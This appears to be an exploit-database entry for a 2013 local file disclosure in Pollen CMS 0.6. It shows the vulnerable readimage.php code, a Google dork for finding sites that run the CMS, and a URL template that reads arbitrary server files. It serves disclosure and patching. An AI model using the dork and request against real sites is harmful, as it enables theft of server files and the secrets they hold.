Pollen CMS - exploit.company

vendor:

Pollen CMS

by:

MizoZ

7,5

CVSS

HIGH

Local File Disclosure

CWE

Product Name: Pollen CMS

Affected Version From: 0.6

Affected Version To: 0.6

Patch Exists: YES

Related CWE: N/A

CPE: a:pollencms:pollencms:0.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu Desktop 12.04

2013

Pollen CMS <= 0.6 - Local File Disclosure

The script readimage.php in Pollen CMS 0.6 does not properly validate the existence of the given file, allowing an attacker to read any file on the server. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server, containing the path to the file to be read.

Mitigation:

Upgrade to a version of Pollen CMS that is not affected by this vulnerability.

Source

Exploit-DB raw data:

# Title: Pollen CMS <= 0.6 - Local File Disclosure
# Google Dork: intext:"Powered by Pollen CMS"
# Date: 25 Mars 2013
# Exploit Author: MizoZ
# Vendor Homepage: pollencms.com (BROKEN)
# Software Link: https://code.google.com/p/pollencms/
# Version: 0.6
# Tested on: Ubuntu Desktop 12.04

-- File "[path]/core/lib/readimage.php"

02 - $image=urldecode($_GET["image"]);
03 - if(is_file($image)){
04 - header("Pragma: no-cache");
05 - header("Expires: 0");
06 - header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
07 - header("Cache-Control: no-cache, must-revalidate");
08 - header("Content-type: image/jpg");
09 - readfile($image);
10 - }else{
11 - header("HTTP/1.0 404 Not Found");
12 - }


-- Problem

   The script only verifies the existence of the given file.


-- Exploit
http://<server>/<path>/core/lib/readimage.php?image=[php urlencoded path to file]